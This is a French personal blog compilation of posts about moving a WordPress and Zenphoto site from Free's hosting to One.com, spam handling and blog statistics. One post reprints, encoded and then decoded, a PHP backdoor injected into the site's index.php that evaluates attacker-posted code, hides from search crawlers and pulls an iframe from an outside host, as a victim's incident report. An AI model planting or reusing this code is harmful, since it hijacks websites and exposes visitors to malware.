Comme je le disais ici, l’importation des tables wordpress ‘posts’ et ‘comments’ sur le nouveau  blog ne s’était pas trop mal passée, mis à part les catégories perdues pour une raison inconnue, ce qui m’avait tout de même obligé à reclasser tous les articles du blog, soit environ 800 ! Heureusement, j’ai pu le faire via le panneau d’administration de WordPress, en utilisant l’option « Modification rapide ».

Mais ce n’était pas tout… 🙁

Zenphoto

Après la réinstallation de zenphoto (voir ici), il a bien fallu mettre à jour tous les articles du blog mentionnant les nouveaux albums disponibles… environ 200 articles cette fois !

J’ai pu en faire une première partie directement en SQL, pour remplacer les URLs :

update 0_posts 
SET post_content = REPLACE(post_content, 'pascal.ledisque.free.fr/wordpress', 'pled.fr')

Le lien vers l’album était alors correct, mais l’affichage d’une image dans l’article ne marchait toujours pas. Plusieurs raisons à cela :

• utilisation du plugin zenpress pour certains articles (et je ne souhaite pas réinstaller ce plugin), et donc syntaxe différente.
• création à une époque de sous-albums dans Zenphoto, ce qui rendait les liens des articles créés précédemment invalides (et qui n’avaient pas été mis à jour).
• un problème lors de l’exportation/importation de la table ‘posts’ avec le caractères ‘&‘ utilisé par Zenphoto, et malencontreusement transformé en ‘&‘, soit son équivalent en code HTML.

Résultat : afin de tout remettre à plat une bonne fois pour toutes, j’ai donc mis à jour les 200 articles un par un… ça m’a pris un peu de temps, mais ça y est, c’est fait ! Sauf erreur de ma part, tous les articles vers l’album photo sont maintenant à jour.

Commentaires

J’ai également eu un léger problème avec les commentaires d’articles.

Première erreur, j’ai importé la table ‘posts’ de mon ancien blog alors que j’avais déjà créé des articles sur le nouveau serveur. Résultat, un petit micmac sur les commentaires assignés à de mauvais articles.

Cela ne concernait que quelques articles heureusement (les premiers du blog), et j’ai remis les bons IDs dans la table ‘comments’ manuellement, ça ne m’a pas pris longtemps. Heureusement, j’avais une version correcte en local sur mon PC, il m’a suffit de comparer disons les vingt premiers articles du blog.

Un dernier problème est apparu : les comptes des commentaires pour un article donné n’étaient pas correct. Un article avec commentaires pouvait afficher « Il n’y a pas de commentaires à cet article », ou le nombre de commentaires était incorrect.

Pour résoudre cela, j’ai utilisé un plugin qui m’a tout corrigé en deux secondes: Web Ninja Comment Count Fixer. Pour info, je l’ai désactivé une fois le problème réparé : il y a des options pour automatiser l’opération, mais je n’en vois pas l’utilité dans mon cas (à priori, il y a eu des problèmes entre WordPress et Disqus, un service de commentaires centralisé).

Google vidéos

J’ai pu me rendre compte d’un autre problème pendant ces manipulations m’amenant à parcourir de vieux articles : certains liens vers les videos que j’avais stockées sur Google ne fonctionnent plus. Normal, puisque Google a arrêté son  service.

Elles ont toutes été migrées sur Youtube par Google à l’époque, j’ai simplement oublié de mettre à jour les liens. Heureusement, cela ne concerne que peu d’articles, qui sont désormais à jour.

Contrairement à ce que j’annonçais dans un précédent article, j’ai fini par installer Zenphoto chez mon nouvel hébergeur, et importer tous les albums que j’avais sur Free.

Ça s’est globalement bien passé (je m’attendais à pire), et finalement, je suis bien content de retrouver tous mes albums comme ça. Coïncidence, on peut voir sur le logo que Zenphoto a le même âge que mon blog, nous avons démarré tous les deux en 2005. Raison de plus pour garder cette excellente galerie photo !

La première raison qui m’a poussé à revoir ma position, c’est l’absence de sauvegarde possible avec la galerie photo que fournit mon hébergeur One.com. J’étais prêt à importer tous les albums manuellement, y compris les légendes des photos ; ça représentait un gros travail, mais je l’aurai fait. Et puis je me suis posé la bonne question : que se passe-t-il si dans un an je décide de changer d’hébergeur ?

La galerie photo de One.com ou plutôt l’interface par laquelle on peut la gérer est tout de même assez basique. Créer des albums, mettre une légende aux photos, inviter des amis, autoriser les commentaires, partager les albums. Voilà, grosso-modo, on a fait le tour. Rien à voir avec le nombre incroyable d’options et de paramètres que propose Zenphoto !

Aucune possibilité d’aller bidouiller le thème, modifier des fichiers php pour faire afficher ce que l’on veut, comme j’aime faire :

Mais le plus important : aucun moyen de sauvegarde, d’import ou d’export ! Gros problème : votre galerie n’existe que le temps que vous êtes chez One.com…

Bref, j’ai installé la dernière version de Zenphoto (1.4.6), puis j’ai importé deux tables de l’installation précédente (j’étais en v1.4) : albums et comments. À ce stade, le fonctionnement était un peu bizarre : je pouvais tout voir dans le panneau d’administration, je pouvais également visualliser les photos d’un album, mais impossible d’afficher les vignettes (albums ou images d’ailleurs)… Après de multiples essais, j’ai fini par relancer l’installation, qui m’a tout remis en ordre.

J’ai même pu autoriser les commentaires à nouveau (mais avec captcha), chose que j’avais du dévalider chez Free suite au grand nombre de spams reçus.

Il y a deux semaines, Free a brusquement bloqué mon compte, et accessoirement détruit la base de données du blog. Ceci sans aucun message pour me prévenir, ce qui me parait pourtant la moindre des choses (pour rappel, le blog fonctionnait depuis 2005 sans problème).

Le site ne marchait tout simplement plus (erreur 403 dans mon cas). L’accès ftp était également bloqué : à vous de deviner ce qui se passe… cool, hein, le service Free ? 🙁

J’ai donc décidé d’abandonner les pages perso free :

• Le blog était déjà pas mal limité par le manque de mémoire alloué par Free, j’en ai déjà parlé ici sur le blog.
• En 2012, c’était l’accès à Akismet, le service de protection contre les spams intégré à WordPress, qui était supprimé, toujours sans aucune explication  (une des caractéristiques récurrentes des services Free).
• Restait alors la solution des plugins pour se protéger, mais là aussi, les ressources allouées par Free empêche d’utiliser les meilleurs (pas assez de mémoire).
• Et la semaine dernière, Free me bloque mon compte et détruit la base SQL du blog arbitrairement, sans explication.

Ici, on atteint les sommets : Free d’une part, nous empêche d’avoir une protection efficace contre les spams, mais se comporte en véritable despote lorsque vous subissez un attaque, malgré toute votre bonne volonté. Bref ras le bol…

One.com

J’ai donc créé un compte chez One.com , un hébergeur payant, mais accessible et fournissant à priori un service de très bonne qualité. J’ai dans la foulée créé mon propre domaine, et j’ai choisi www.pled.fr, là où vous êtes actuellement. C’est la nouvelle adresse du blog.

La première année étant offerte, je n’ai payé que le nom de domaine pour cette première année, soit 14,40 €. L’année prochaine, cela devrait me coûter environ 50€ à l’année.

Migration

La migration du blog en lui-même ne s’est pas trop mal passée : installation en un click de la version 4.0, enfin ! (j’étais bloqué à la 3.2.1 avec Free à cause du manque de ressources). Les articles et les commentaires ont été importés sans problème sur le nouveau, à ceci près que j’ai perdu les catégories des articles. J’ai donc environ 800 articles à modifier manuellement, ça va me prendre un peu de temps.

Il va falloir aussi revoir certains plugins… et certainement plein de petits autres trucs. Mais bon, dans l’ensemble, c’est plutôt pas mal, et le blog est déjà opérationnel.

Le bon côté, c’est que je suis maintenant en v4.0, que je ne suis plus bloqué par le manque de ressources par Free. Ça donne envie de refaire des choses là où la situation était bloquée.

Le vrai problème, ce sera la galerie Zenphoto : pas sûr que je puisse réinstaller tout ça à l’indentique sans galérer… pas sûr que j’en ai vraiment envie d’ailleurs, la mode des photos m’a un peu passée. Mais il y a un bel historique, ne serait-ce que pour les amis… À voir après le blog.

Pour la petite histoire

Une fois compris ce qui se passait (ce n’est pas évident), il faut se rendre sur l’interface de gestion de free, et cliquer sur « Ré-activer votre compte pour les pages personnelles (si celui-ci a été suspendu) ».
Dans mon cas, le message était le suivant :

Base mysql polluée par du spam. Nous avons vidé les tables mysql concernées. Mettre en place des mesures de protection contre le spam.
Ce bloquage consitue un avertissement. Afin de retrouver l’accès à votre page personnelle, vous devez vous engager à corriger les points cités ci- dessus au plus vite.

C’est parti, il faut aller demander le déblocage du compte sur le news group proxad.free.servies.pagesperso… puis attendre, des bénévoles répondent, et transmettent les consignes et procédures. Il faut indiquer les actions que l’on va prendre pour que cela ne se reproduise plus. La demande officielle est finalement faite.

Hélas, le temps que tout cela se passe, il est déjà vendredi soir ! Pas de chance Pascal !

La personne qui « débloque les comptes » ne travaillant pas le week-end, et ayant potentiellemnt pris un RTT le lundi… ce n’est qu’aujourd’hui mardi que mon compte a enfin été débloqué.

Pour conclure

OK, ce service est gratuit. J’imagine également que les moyens pour maintenir ce service sont extrêmement limités. Mais ce serait peut-être mieux de carrément le fermer, si Free n’est pas en mesure de traiter ses clients correctement. Je me vois mal effacer la base de données d’un client pour des problèmes de sécurité réseau dont je suis responsable, mais incapable d’assumer, et ne pas prendre la peine de le prévenir qu’un problème a eu lieu.

Depuis quelques jours, le blog était inaccessible avec ce beau message d’erreur. J’ai d’abord cru à un problème temporaire chez Free, et je ne me suis pas trop inquiété.

Le problème persistant, je me suis rappelé que j’avais changé mes mots de passe pour accéder aux pages Free d’administration de mon compte. Et que j’avais oublié de mettre à jour le fichier wp-config.php. Je modifie en conséquence ce dernier, mais le problème persiste. La prise de tête commence.

Continuer la lecture… Blog indisponible : « Error establishing a database connection » →

Comme chaque début d’année, c’est le moment de regarder un peu les statistiques du blog.

Le nombre de visites continue de monter : l’année dernière, on dépassait la barre des 6 000 visites plusieurs fois, cette année c’est la barre des 10 000 qui a été franchie deux fois.

Je n’ai publié que 71 articles cette année, contre 101 l’année dernière (et 96 l’année précédente)… En nette baisse donc. 🙁

Un premier plugin WP online counter, activé depuis le début du site ou presque (et affiché en bas de page), me donne un nombre total de visiteurs de 688 476 à ce jour, contre 482 703 il y a un an. La barre des 500 000 visites a donc été allègrement franchie… la prochaine barre , c’est le million, mais ce ne sera pas sans doute pas pour cette année, gardons les pieds sur terre…

Vous trouverez un peu plus de statistiques ci-dessous.

Continuer la lecture… Statistiques du blog – année 2012 →

 Laisser les commentaires ouverts sur le blog, cela veut dire recevoir plein de spams.

J’utilise pour le filtrage le plugin Akismet qui fonctionne plutôt pas mal, qui est gratuit pour les particuliers, et fournit par défaut avec WordPress.

Le principe est simple : à chaque commentaire, il se connecte sur un de leurs serveurs pour une série de tests, et renvoie une réponse positive ou négative. Jusque là tout va bien.

J’avais toutefois pas mal de confirmation à faire manuellement (une vingtaine par jour) : commentaires détectés comme suspects par Akismet, mais qui n’ont pas pu être vérifiés, probablement parce que le serveur n’a pas pu être contacté à ce moment là. Ce qui donne ce message dans le panneau d’admin wordpress :

Donc ce matin, j’ai voulu mettre à jour le plugin à la dernière version 2.5.5 (j’étais en 2.5.3) voyant qu’ils avaient amélioré cette partie :

Add more checks on the scheduled re-check feature, force it to be no more than 20 minutes in the future.

Hélas, impossible de réactiver le plugin, et les spams commencent à tomber :

Il était urgent de faire quelque chose !

Continuer la lecture… Akismet ne fonctionne plus chez Free →

Hier matin, le blog affichait en haut de page un beau message d’erreur. C’est Merlinux qui m’a prévenu par mail, car de mon côté tout était normal, alors que lui voyait le message suivant :

Après quelques vérifications, je me suis alors rendu compte que le fichier index.php (à la racine du site ET à la racine de wordpress) avaient été modifiés et comprenaient l’instruction suivante :

<?php /*68066*/ error_reporting(0); @ini_set('error_log',NULL);
@ini_set('log_errors',0); @ini_set('display_errors','Off'); 
@eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pd
CgwKTsKaWYgKGlzc2V0KCRfUE9TVFsnY29va2llc19pJ10pKSB7ZXZhbChiYXNlNjR
fZGVjb2RlKCRfUE9TVFsnY29va2llc19pJ10pKTt9CiR6Mzc9InN0YXRzIjsKJHVhM
z0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07CiR1MzcgPSBhcnJheSgiR29vZ2x
lIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiU
mFtYmxlciIsICJNYWMiKTsKaWYoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCI
sICR1MzcpIC4gIi9pIiwgJHVhMykpIG9yIChpc3NldCgkX1NFUlZFUlsiSFRUUF9VU
0VSX0FHRU5UIl0pID09MCkgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX0NPT0tJRSJ
dKSkpCnt9CmVsc2UKewpAc2V0Y29va2llKCR6MzcsbWQ1KCJzdGF0cyIpLHRpbWUoK
SsxNzI4MDApOwokaWQ9IjlvOGFhODhsOGVqaTEycmpmNWtva2VteGZ5amx6MXQiOwo
kdXJsPSJodHRwOi8vaWZyYW1lc2hvcC5uZXQvc3RpLnBocD9pZD0iLiRpZDsKJGlmc
mFtZT1AZmlsZV9nZXRfY29udGVudHMgKCR1cmwpOwppZiAoJGlmcmFtZSkgZWNobyg
kaWZyYW1lKTsgCn0K'));/*68066*/ ?>

Mais qu’est-ce que ça veut dire ? Pour décoder tout ça, il suffit d’aller sur ce site et d’y entrer le contenu de la chaîne codée. Et on y retrouve bien l’URL du message d’erreur :

error_reporting(0); set_time_limit(0); 
if (isset($_POST['cookies_i'])) {eval(base64_decode($_POST['cookies_i']));} $z37="stats"; $ua3=$_SERVER["HTTP_USER_AGENT"]; 
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Mac"); 
if((preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_SERVER["HTTP_USER_AGENT"]) ==0) or (isset($_SERVER["HTTP_COOKIE"]))) {} else { @setcookie($z37,md5("stats"),time()+172800); $id="9o8aa88l8eji12rjf5kokemxfyjlz1t"; 
$url="http://iframeshop.net/sti.php?id=".$id; $iframe=@file_get_contents ($url); 
if ($iframe) echo($iframe); } 

Bon, en gros cela injecte une iframe dans ma page (une page dans la page). Pour quoi faire je n’en sais rien, peut-être simplement afficher de la publicité, ou pire installer un malware sur le PC ? En tout cas des petits malins qui ont probablement exploité une faille de sécurité.

Bon j’ai nettoyé les deux fichiers, changé le mot de passe FTP, tout est rentré dans l’ordre. Pas sûr que cela soit suffisant, il est possible que cela revienne si c’est une faille de sécurité de WordPress (v3.2.1). C’est peut-être aussi le serveur de Free qui n’est pas assez sécurisé, autorisant ce genre « d’exploit ». Free est pourtant assez restrictif pour sécuriser leurs serveurs…

Bref, on voit toute la difficulté de se protéger contre les attaques de ce genre. Attendons de voir la suite, pour l’instant tout va bien, les fichiers n’ont pas été réinfectés. Je vais les surveiller pendant quelques jours pour m’en assurer.

 Début janvier, j’ai publié les stats du blog, obtenues à l’aide du plugin WordPress.com Stats.

Un commentaire de Merlinux me demande alors des infos sur ce plugin ; je lui répond bien volontiers, et voilà qu’après avoir fait ses propres recherches, il m’informe que ce plugin envoie des infos chez Quantcast.

Quantcast est un service web de statistiques destinés aux annonceurs et commerçants. Il collecte des informations et les fournit pour une publicité ciblée.

J’étais très surpris, persuadé que la politique de confidentialité de WordPress était satisfaisante, et d’autre part n’ayant jamais vu aucune mention de ce traqueur intégré dans le plugin.

Évidemment, je ne veux pas de genre de trucs sur mon blog : pas de pub, pas de bouton genre Facebook et plus généralement pas de traçage… j’avais d’ailleurs retiré Google Analytics il y a un an lorsque j’avais réalisé qu’ils utilisaient les données collectées.

Continuer la lecture… Un traqueur dans WordPress.com stats →